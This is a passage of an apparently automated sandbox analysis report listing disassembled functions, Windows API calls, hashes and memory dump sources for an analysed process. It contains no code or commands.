                • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                • API String ID: 55579361-631824599
                • Opcode ID: c54fddc0a4ec1af27af9f93c29b3fe8be51c7bf1106da498bf24683b37423695
                • Instruction ID: 11034a12e420b4141b8c7d957847e96e6acf50efdbcc39d69c8d0c9783138566
                • Opcode Fuzzy Hash: c54fddc0a4ec1af27af9f93c29b3fe8be51c7bf1106da498bf24683b37423695
                • Instruction Fuzzy Hash: 88E092706007108BD7309F28E814757BBF4FF05301F148DACE986E2652E7B9D844CB91
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00BFE59A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: LocalTime
                • String ID: %.3d$X64
                • API String ID: 481472006-1077770165
                • Opcode ID: d39a228d03e7eaf4bd72f029eb2230592525c3f95f338bca41af64d8f2a87d75
                • Instruction ID: 9d8200818b1132af1d678d6bc365530a2fb7cdfd9f207cb036a825cb74ad8aed
                • Opcode Fuzzy Hash: d39a228d03e7eaf4bd72f029eb2230592525c3f95f338bca41af64d8f2a87d75
                • Instruction Fuzzy Hash: C8D062B1C1411DE6CF909AA0DDC99FEB3FCA728700F5044E2FA16D6160E674D54D9721
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00BDC19D Relevance: 5.1, APIs: 4, Instructions: 139COMMON
                Download Yara Rule
                APIs
                • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 00BDC233
                • GetLastError.KERNEL32 ref: 00BDC241
                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00BDC29C
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: ByteCharMultiWide$ErrorLast
                • String ID:
                • API String ID: 1717984340-0
                • Opcode ID: 00d6a98a93467902b47bfe8fb618ace86b3a7204579360f85bf3c8968e21e6bd
                • Instruction ID: d5033ca92019a42b1ea09febed9a2b829ea5cc9472c3e503f3e9bc2c1e90aaa5
                • Opcode Fuzzy Hash: 00d6a98a93467902b47bfe8fb618ace86b3a7204579360f85bf3c8968e21e6bd
                • Instruction Fuzzy Hash: 01419271600217AFCB258FE5D844BBAFFE5EF45720F2441EAE859A72A1EB308D01D750
                Uniqueness

                Uniqueness Score: -1.00%